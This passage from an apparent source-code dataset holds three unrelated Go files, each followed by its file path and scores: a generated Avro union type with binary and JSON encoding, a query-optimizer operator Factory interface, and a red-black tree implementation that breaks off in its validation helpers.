UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 12
)
type UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject struct {
Null *types.NullVal
Integer *Integer
Character *Character
Decimal *Decimal
Float *Float
Timestamp *Timestamp
DateTime *DateTime
TimestampWithTimeZone *TimestampWithTimeZone
BinaryGeometry *BinaryGeometry
TextGeometry *TextGeometry
BinaryObject *BinaryObject
TextObject *TextObject
EmptyObject EmptyObject
UnionType UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum
}
func writeUnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject(r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject, w io.Writer) error {
if r == nil {
err := vm.WriteLong(0, w)
return err
}
err := vm.WriteLong(int64(r.UnionType), w)
if err != nil {
return err
}
switch r.UnionType {
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger:
return writeInteger(r.Integer, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter:
return writeCharacter(r.Character, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal:
return writeDecimal(r.Decimal, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat:
return writeFloat(r.Float, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp:
return writeTimestamp(r.Timestamp, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime:
return writeDateTime(r.DateTime, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone:
return writeTimestampWithTimeZone(r.TimestampWithTimeZone, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry:
return writeBinaryGeometry(r.BinaryGeometry, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry:
return writeTextGeometry(r.TextGeometry, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject:
return writeBinaryObject(r.BinaryObject, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject:
return writeTextObject(r.TextObject, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject:
return writeEmptyObject(r.EmptyObject, w)
}
return fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
}
func NewUnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject() *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject {
return &UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject{}
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetBoolean(v bool) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetInt(v int32) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetFloat(v float32) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetDouble(v float64) {
panic("Unsupported operation")
}
// SetBytes panics: this union never holds a raw bytes value directly.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetBytes(v []byte) {
	panic("Unsupported operation")
}
// SetString panics: this union never holds a raw string value directly.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetString(v string) {
	panic("Unsupported operation")
}
// SetLong records the active union branch by storing the branch index as the
// union's type tag.
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetLong(v int64) {
	r.UnionType = (UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum)(v)
}
// Get returns the writable field for branch i, allocating a fresh branch
// value so the caller can populate it. Branch 0 (null) is returned as-is and
// branch 12 (EmptyObject) is returned through a wrapper around the field.
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) Get(i int) types.Field {
	switch i {
	case 0:
		return r.Null
	case 1:
		r.Integer = NewInteger()
		return r.Integer
	case 2:
		r.Character = NewCharacter()
		return r.Character
	case 3:
		r.Decimal = NewDecimal()
		return r.Decimal
	case 4:
		r.Float = NewFloat()
		return r.Float
	case 5:
		r.Timestamp = NewTimestamp()
		return r.Timestamp
	case 6:
		r.DateTime = NewDateTime()
		return r.DateTime
	case 7:
		r.TimestampWithTimeZone = NewTimestampWithTimeZone()
		return r.TimestampWithTimeZone
	case 8:
		r.BinaryGeometry = NewBinaryGeometry()
		return r.BinaryGeometry
	case 9:
		r.TextGeometry = NewTextGeometry()
		return r.TextGeometry
	case 10:
		r.BinaryObject = NewBinaryObject()
		return r.BinaryObject
	case 11:
		r.TextObject = NewTextObject()
		return r.TextObject
	case 12:
		return &EmptyObjectWrapper{Target: (&r.EmptyObject)}
	}
	panic("Unknown field index")
}
// NullField panics: union branches cannot be individually nulled.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) NullField(i int) {
	panic("Unsupported operation")
}
// SetDefault panics: unions have no per-field defaults.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetDefault(i int) {
	panic("Unsupported operation")
}
// AppendMap panics: a union is not a map.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) AppendMap(key string) types.Field {
	panic("Unsupported operation")
}
// AppendArray panics: a union is not an array.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) AppendArray() types.Field {
	panic("Unsupported operation")
}
// Finalize is a no-op for unions.
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) Finalize() {
}
// MarshalJSON encodes the union as a single-key JSON object naming the active
// branch (e.g. {"Integer": ...}); a nil receiver encodes as JSON null.
// NOTE(review): a UnionType equal to the null branch falls through to the
// error return rather than encoding as null -- only a nil receiver produces
// "null". Confirm this matches the code generator's intent.
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) MarshalJSON() ([]byte, error) {
	if r == nil {
		return []byte("null"), nil
	}
	switch r.UnionType {
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger:
		return json.Marshal(map[string]interface{}{"Integer": r.Integer})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter:
		return json.Marshal(map[string]interface{}{"Character": r.Character})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal:
		return json.Marshal(map[string]interface{}{"Decimal": r.Decimal})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat:
		return json.Marshal(map[string]interface{}{"Float": r.Float})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp:
		return json.Marshal(map[string]interface{}{"Timestamp": r.Timestamp})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime:
		return json.Marshal(map[string]interface{}{"DateTime": r.DateTime})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone:
		return json.Marshal(map[string]interface{}{"TimestampWithTimeZone": r.TimestampWithTimeZone})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry:
		return json.Marshal(map[string]interface{}{"BinaryGeometry": r.BinaryGeometry})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry:
		return json.Marshal(map[string]interface{}{"TextGeometry": r.TextGeometry})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject:
		return json.Marshal(map[string]interface{}{"BinaryObject": r.BinaryObject})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject:
		return json.Marshal(map[string]interface{}{"TextObject": r.TextObject})
	case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject:
		return json.Marshal(map[string]interface{}{"EmptyObject": r.EmptyObject})
	}
	return nil, fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
}
func (r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) UnmarshalJSON(data []byte) error {
var fields map[string]json.RawMessage
if err := json.Unmarshal(data, &fields); err != nil {
return err
}
if value, ok := fields["Integer"]; ok {
r.UnionType = 1
return json.Unmarshal([]byte(value), &r.Integer)
}
if value, ok := fields["Character"]; ok {
r.UnionType = 2
return json.Unmarshal([]byte(value), &r.Character)
}
if value, ok := fields["Decimal"]; ok {
r.UnionType = 3
return json.Unmarshal([]byte(value), &r.Decimal)
}
if value, ok := fields["Float"]; ok {
r.UnionType = 4
return json.Unmarshal([]byte(value), &r.Float)
}
if value, ok := fields["Timestamp"]; ok {
r.UnionType = 5
return json.Unmarshal([]byte(value), &r.Timestamp)
}
if value, ok := fields["DateTime"]; ok {
r.UnionType = 6
return json.Unmarshal([]byte(value), &r.DateTime)
}
if value, ok := fields["TimestampWithTimeZone"]; ok {
r.UnionType = 7
return json.Unmarshal([]byte(value), &r.TimestampWithTimeZone)
}
if value, ok := fields["BinaryGeometry"]; ok {
r.UnionType = 8
return json.Unmarshal([]byte(value), &r.BinaryGeometry)
}
if value, ok := fields["TextGeometry"]; ok {
r.UnionType = 9
return json.Unmarshal([]byte(value), &r.TextGeometry)
}
if value, ok := fields["BinaryObject"]; ok {
r.UnionType = 10
return json.Unmarshal([]byte(value), &r.BinaryObject)
}
if value, ok := fields["TextObject"]; ok {
r.UnionType = 11
return json.Unmarshal([]byte(value), &r.TextObject)
}
if value, ok := fields["EmptyObject"]; ok {
r.UnionType = 12
return json.Unmarshal([]byte(value), &r.EmptyObject)
}
return fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
} | dtsavro/union_null_integer_character_decimal_float_timestamp_date_time_timestamp_with_time_zone_binary_geometry_text_geometry_binary_object_text_object_empty_object.go | 0.81119 | 0.41834 | union_null_integer_character_decimal_float_timestamp_date_time_timestamp_with_time_zone_binary_geometry_text_geometry_binary_object_text_object_empty_object.go | starcoder |
package opt
type Factory interface {
// Metadata returns the query-specific metadata, which includes information
// about the columns and tables used in this particular query.
Metadata() *Metadata
// StoreList allocates storage for a list of group IDs in the memo and
// returns an ID that can be used for later lookup.
StoreList(items []GroupID) ListID
// InternPrivate adds the given private value to the memo and returns an ID
// that can be used for later lookup. If the same value was added before,
// then this method is a no-op and returns the ID of the previous value.
InternPrivate(private interface{}) PrivateID
// DynamicConstruct dynamically constructs an operator with the given type
// and operands. It is equivalent to a switch statement that calls the
// ConstructXXX method that corresponds to the given operator.
DynamicConstruct(op Operator, children []GroupID, private PrivateID) GroupID
// Scalar operator constructors.
ConstructSubquery(input GroupID, projection GroupID) GroupID
ConstructVariable(col PrivateID) GroupID
ConstructConst(value PrivateID) GroupID
ConstructTrue() GroupID
ConstructFalse() GroupID
ConstructPlaceholder(value PrivateID) GroupID
ConstructTuple(elems ListID) GroupID
ConstructProjections(elems ListID, cols PrivateID) GroupID
ConstructFilters(conditions ListID) GroupID
ConstructExists(input GroupID) GroupID
ConstructAnd(left GroupID, right GroupID) GroupID
ConstructOr(left GroupID, right GroupID) GroupID
ConstructNot(input GroupID) GroupID
ConstructEq(left GroupID, right GroupID) GroupID
ConstructLt(left GroupID, right GroupID) GroupID
ConstructGt(left GroupID, right GroupID) GroupID
ConstructLe(left GroupID, right GroupID) GroupID
ConstructGe(left GroupID, right GroupID) GroupID
ConstructNe(left GroupID, right GroupID) GroupID
ConstructIn(left GroupID, right GroupID) GroupID
ConstructNotIn(left GroupID, right GroupID) GroupID
ConstructLike(left GroupID, right GroupID) GroupID
ConstructNotLike(left GroupID, right GroupID) GroupID
ConstructILike(left GroupID, right GroupID) GroupID
ConstructNotILike(left GroupID, right GroupID) GroupID
ConstructSimilarTo(left GroupID, right GroupID) GroupID
ConstructNotSimilarTo(left GroupID, right GroupID) GroupID
ConstructRegMatch(left GroupID, right GroupID) GroupID
ConstructNotRegMatch(left GroupID, right GroupID) GroupID
ConstructRegIMatch(left GroupID, right GroupID) GroupID
ConstructNotRegIMatch(left GroupID, right GroupID) GroupID
ConstructIs(left GroupID, right GroupID) GroupID
ConstructIsNot(left GroupID, right GroupID) GroupID
ConstructContains(left GroupID, right GroupID) GroupID
ConstructContainedBy(left GroupID, right GroupID) GroupID
ConstructAny(left GroupID, right GroupID) GroupID
ConstructSome(left GroupID, right GroupID) GroupID
ConstructAll(left GroupID, right GroupID) GroupID
ConstructBitand(left GroupID, right GroupID) GroupID
ConstructBitor(left GroupID, right GroupID) GroupID
ConstructBitxor(left GroupID, right GroupID) GroupID
ConstructPlus(left GroupID, right GroupID) GroupID
ConstructMinus(left GroupID, right GroupID) GroupID
ConstructMult(left GroupID, right GroupID) GroupID
ConstructDiv(left GroupID, right GroupID) GroupID
ConstructFloorDiv(left GroupID, right GroupID) GroupID
ConstructMod(left GroupID, right GroupID) GroupID
ConstructPow(left GroupID, right GroupID) GroupID
ConstructConcat(left GroupID, right GroupID) GroupID
ConstructLShift(left GroupID, right GroupID) GroupID
ConstructRShift(left GroupID, right GroupID) GroupID
ConstructFetchVal(json GroupID, index GroupID) GroupID
ConstructFetchText(json GroupID, index GroupID) GroupID
ConstructFetchValPath(json GroupID, path GroupID) GroupID
ConstructFetchTextPath(json GroupID, path GroupID) GroupID
ConstructUnaryPlus(input GroupID) GroupID
ConstructUnaryMinus(input GroupID) GroupID
ConstructUnaryComplement(input GroupID) GroupID
ConstructFunction(args ListID, def PrivateID) GroupID
// Relational operator constructors.
ConstructScan(table PrivateID) GroupID
ConstructValues(rows ListID, cols PrivateID) GroupID
ConstructSelect(input GroupID, filter GroupID) GroupID
ConstructProject(input GroupID, projections GroupID) GroupID
ConstructInnerJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructLeftJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructRightJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructFullJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructSemiJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructAntiJoin(left GroupID, right GroupID, on GroupID) GroupID
ConstructInnerJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructLeftJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructRightJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructFullJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructSemiJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructAntiJoinApply(left GroupID, right GroupID, on GroupID) GroupID
ConstructGroupBy(input GroupID, groupings GroupID, aggregations GroupID) GroupID
ConstructUnion(left GroupID, right GroupID, colMap PrivateID) GroupID
ConstructIntersect(left GroupID, right GroupID) GroupID
ConstructExcept(left GroupID, right GroupID) GroupID
} | pkg/sql/opt/opt/factory.og.go | 0.647575 | 0.447762 | factory.og.go | starcoder |
package rbt
import "fmt"
// KeyType is the key type stored in tree nodes.
type KeyType int64
const (
	// maxKey and minKey bound the valid key range; used as the initial
	// bounds by the BST-property check.
	maxKey = KeyType(0x7fffffffffffffff)
	minKey = -maxKey - 1
)
const (
	// Node colors. Black is 1 so a node's color can be added directly to a
	// black-height count (see validateBlackHeight).
	Red = 0
	Black = 1
)
// Node is a single tree node. Leaf children are represented by the tree's
// shared black sentinel, not by nil pointers.
type Node struct {
	Key KeyType
	Parent, Left, Right *Node
	Color uint8
}
// Tree is a red-black tree. Nil points at the per-tree sentinel leaf nilN,
// which is always black and stands in for every external leaf.
type Tree struct {
	Root, Nil *Node
	nilN Node
}
// New returns an empty red-black tree. Each tree owns a single black
// sentinel node that represents every leaf; the root starts as the sentinel.
func New() *Tree {
	t := &Tree{}
	t.nilN.Color = Black
	t.Nil = &t.nilN
	t.Root = t.Nil
	return t
}

// makeNode allocates a fresh red node for key k with all links pointing at
// the tree's sentinel.
func (t *Tree) makeNode(k KeyType) *Node {
	return &Node{
		Key:    k,
		Parent: t.Nil,
		Left:   t.Nil,
		Right:  t.Nil,
		Color:  Red,
	}
}
// Insert adds key k to the tree: a standard BST descent (duplicates go to
// the left subtree), a new red node linked at the leaf position, then
// insertFixup restores the red-black invariants.
func (t *Tree) Insert(k KeyType) {
	y := t.Nil
	x := t.Root
	// Descend to the insertion point, tracking the parent in y.
	for x != t.Nil {
		y = x
		if k <= x.Key {
			x = x.Left
		} else {
			x = x.Right
		}
	}
	z := t.makeNode(k)
	z.Parent = y
	if y == t.Nil {
		// Tree was empty: the new node becomes the root.
		t.Root = z
	} else if k <= y.Key {
		y.Left = z
	} else {
		y.Right = z
	}
	t.insertFixup(z)
}
// insertFixup restores the red-black properties after inserting the red node
// z. Only the "no red node has a red child" rule can be violated; the
// violation is repaired bottom-up. In the loop, y is z's grandparent.
func (t *Tree) insertFixup(z *Node) {
	for z.Parent.Color == Red {
		y := z.Parent.Parent
		if z.Parent == y.Left {
			if y.Right.Color == Red {
				// Case 1: red uncle -- recolor and move the violation up.
				y.Color = Red
				y.Left.Color = Black
				y.Right.Color = Black
				z = y
			} else { // y.Right.Color == Black
				if z == z.Parent.Right {
					// Case 2: straighten a zig-zag into a straight line.
					z = z.Parent
					t.leftRotate(z)
				}
				// Case 3: rotate the grandparent and swap colors; ends the loop.
				z.Parent.Color = Black
				y.Color = Red
				t.rightRotate(y)
			}
		} else { // z.Parent == y.Right (mirror image of the branch above)
			if y.Left.Color == Red {
				// Case 1: red uncle -- recolor and move the violation up.
				y.Color = Red
				y.Left.Color = Black
				y.Right.Color = Black
				z = y
			} else { // y.Left.Color == Black
				if z == z.Parent.Left {
					// Case 2: straighten a zig-zag into a straight line.
					z = z.Parent
					t.rightRotate(z)
				}
				// Case 3: rotate the grandparent and swap colors; ends the loop.
				z.Parent.Color = Black
				y.Color = Red
				t.leftRotate(y)
			}
		}
	}
	// The root is always black.
	t.Root.Color = Black
}
// Delete removes one node with key k, if present. color tracks the color of
// the node that is physically removed (or moved); removing a black node can
// break the black-height invariant, which deleteFixup then repairs starting
// at x, the node that took the removed node's place.
func (t *Tree) Delete(k KeyType) {
	z := t.Root
	for z != t.Nil && z.Key != k {
		if k < z.Key {
			z = z.Left
		} else {
			z = z.Right
		}
	}
	var x *Node
	color := z.Color
	switch {
	case z == t.Nil:
		return // Key not found.
	case z.Left == t.Nil:
		// Node to delete has at most a right child.
		x = z.Right
		t.transplant(z, x)
	case z.Right == t.Nil:
		// Node to delete has only a left child
		x = z.Left
		t.transplant(z, x)
	default:
		// Two children: splice out z's in-order successor y and move it
		// into z's position, keeping z's color.
		y := t.min(z.Right)
		color = y.Color
		x = y.Right
		if y.Parent == z {
			x.Parent = y
		} else {
			t.transplant(y, y.Right)
			y.Right = z.Right
			y.Right.Parent = y
		}
		t.transplant(z, y)
		y.Left = z.Left
		y.Left.Parent = y
		y.Color = z.Color
	}
	if color == Black {
		t.deleteFixup(x)
	}
}
// deleteFixup restores the black-height invariant after a black node was
// removed: x carries an extra "double black" that is either pushed up the
// tree or resolved by borrowing from its sibling w, following the four
// classic cases on each side.
func (t *Tree) deleteFixup(x *Node) {
	for x != t.Root && x.Color == Black {
		if x == x.Parent.Left {
			w := x.Parent.Right
			if w.Color == Red {
				// Case 1: make the sibling black
				t.leftRotate(x.Parent)
				w.Color = Black
				x.Parent.Color = Red
				w = x.Parent.Right
			}
			if w.Left.Color == Black && w.Right.Color == Black {
				// Case 2: push the double blackness up
				w.Color = Red
				x = x.Parent
			} else {
				// Case 3: rotate so the sibling's far child is red.
				if w.Left.Color == Red && w.Right.Color == Black {
					w.Color = Red
					w.Left.Color = Black
					t.rightRotate(w)
					w = x.Parent.Right
				}
				// Case 4: remove the double blackness; end
				w.Color = x.Parent.Color
				w.Right.Color = Black
				x.Parent.Color = Black
				t.leftRotate(x.Parent)
				x = t.Root
			}
		} else { // x == x.Parent.Right (mirror image of the branch above)
			w := x.Parent.Left
			if w.Color == Red {
				// Case 1: make the sibling black
				t.rightRotate(x.Parent)
				w.Color = Black
				x.Parent.Color = Red
				w = x.Parent.Left
			}
			if w.Left.Color == Black && w.Right.Color == Black {
				// Case 2: push the double blackness up
				w.Color = Red
				x = x.Parent
			} else {
				// Case 3: rotate so the sibling's far child is red.
				if w.Left.Color == Black && w.Right.Color == Red {
					w.Color = Red
					w.Right.Color = Black
					t.leftRotate(w)
					w = x.Parent.Left
				}
				// Case 4: remove the double blackness; end
				w.Color = x.Parent.Color
				w.Left.Color = Black
				x.Parent.Color = Black
				t.rightRotate(x.Parent)
				x = t.Root
			}
		}
	}
	x.Color = Black
}
// leftRotate rotates the subtree rooted at x to the left: x's right child y
// takes x's place and x becomes y's left child.
func (t *Tree) leftRotate(x *Node) {
	y := x.Right
	y.Parent = x.Parent
	if x == t.Root {
		t.Root = y
	} else {
		if x == x.Parent.Left {
			x.Parent.Left = y
		} else {
			x.Parent.Right = y
		}
	}
	// y's former left subtree becomes x's right subtree.
	x.Right = y.Left
	if y.Left != t.Nil {
		y.Left.Parent = x
	}
	y.Left = x
	x.Parent = y
}
// rightRotate is the mirror image of leftRotate: y's left child x takes y's
// place and y becomes x's right child.
func (t *Tree) rightRotate(y *Node) {
	x := y.Left
	x.Parent = y.Parent
	if y == t.Root {
		t.Root = x
	} else {
		if y == y.Parent.Left {
			y.Parent.Left = x
		} else {
			y.Parent.Right = x
		}
	}
	// x's former right subtree becomes y's left subtree.
	y.Left = x.Right
	if x.Right != t.Nil {
		x.Right.Parent = y
	}
	x.Right = y
	y.Parent = x
}
// transplant replaces the subtree rooted at u with the subtree rooted at v,
// rewiring u's parent (or the tree root) to point at v.
func (t *Tree) transplant(u, v *Node) {
	switch {
	case u.Parent == t.Nil:
		t.Root = v
	case u == u.Parent.Left:
		u.Parent.Left = v
	default:
		u.Parent.Right = v
	}
	v.Parent = u.Parent
}

// min returns the leftmost (minimum-key) node of the subtree rooted at u.
func (t *Tree) min(u *Node) *Node {
	n := u
	for n.Left != t.Nil {
		n = n.Left
	}
	return n
}
// WriteDot renders the whole tree as a Graphviz "dot" digraph string.
func (t *Tree) WriteDot() string {
	_, nodes := t.writeDotNodes(1, t.Root)
	_, edges := t.writeDotEdges(1, t.Root)
	return "digraph RBTree {\n" + nodes + edges + "}\n"
}

// leafString is the dot attribute string used to draw sentinel leaves.
const leafString = "[shape=point]"
// writeDotNodes emits one dot node statement per tree node, assigning ids in
// preorder starting at n; sentinel leaves are drawn as points. It returns the
// next unused id and the accumulated statements.
func (t *Tree) writeDotNodes(n uint, nd *Node) (uint, string) {
	if nd == t.Nil {
		return n + 1, fmt.Sprintf("n%d%s\n", n, leafString)
	}
	var color string
	if nd.Color == Red {
		color = "red"
	} else {
		color = "black"
	}
	var s, sl, sr string
	s = fmt.Sprintf("n%d[label=\"%d\", color=%s]\n", n, int64(nd.Key), color)
	n, sl = t.writeDotNodes(n + 1, nd.Left)
	n, sr = t.writeDotNodes(n, nd.Right)
	return n, s + sl + sr
}
// writeDotEdges emits parent->child edges using the same preorder id scheme
// as writeDotNodes: node n's left child is n+1 and its right child's id is
// whatever the left subtree's traversal returned (nl).
func (t *Tree) writeDotEdges(n uint, nd *Node) (uint, string) {
	if nd == t.Nil {
		return n + 1, ""
	}
	nl, sl := t.writeDotEdges(n + 1, nd.Left)
	nr, sr := t.writeDotEdges(nl, nd.Right)
	s := fmt.Sprintf("n%d -> n%d[arrowhead=none]\n", n, n + 1)
	s += fmt.Sprintf("n%d -> n%d[arrowhead=none]\n", n, nl)
	return nr, s + sl + sr
}
// validateTreeConnectivity reports whether every child's Parent pointer in
// the tree points back at its actual parent.
func (t *Tree) validateTreeConnectivity() bool {
	return t.validateConnectivity(t.Root)
}

// validateConnectivity recursively checks parent/child link consistency for
// the subtree rooted at nd. A literal nil pointer (as opposed to the
// sentinel) is invalid.
func (t *Tree) validateConnectivity(nd *Node) bool {
	if nd == t.Nil {
		return true
	}
	if nd == nil {
		return false
	}
	for _, child := range []*Node{nd.Left, nd.Right} {
		if !t.validateConnectivity(child) {
			return false
		}
		if child != t.Nil && child.Parent != nd {
			return false
		}
	}
	return true
}

// validateTreeBlackHeight reports whether every root-to-leaf path carries
// the same number of black nodes.
func (t *Tree) validateTreeBlackHeight() bool {
	_, ok := t.validateBlackHeight(t.Root)
	return ok
}
// validateBlackHeight returns the black-height of the subtree rooted at x
// and whether both of its subtrees agree on that height (the red-black
// black-height invariant).
func (t *Tree) validateBlackHeight(x *Node) (uint, bool) {
	if x == t.Nil {
		return 0, true
	}
	h1, e1 := t.validateBlackHeight(x.Left)
	// BUG fix: this recursed on x.Left twice, so the right subtree was
	// never actually validated.
	h2, e2 := t.validateBlackHeight(x.Right)
	if !e1 || !e2 {
		return 0, false
	}
	if h1 != h2 {
		return 0, false
	}
	// Black == 1 and Red == 0, so adding the color counts black nodes.
	return h1 + uint(x.Color), true
}
// validateTreeRedChildren reports whether no red node in the tree has a red
// child.
func (t *Tree) validateTreeRedChildren() bool {
	return t.validateRedChildren(t.Root)
}

// validateRedChildren checks the red-node invariant for the subtree rooted
// at x.
func (t *Tree) validateRedChildren(x *Node) bool {
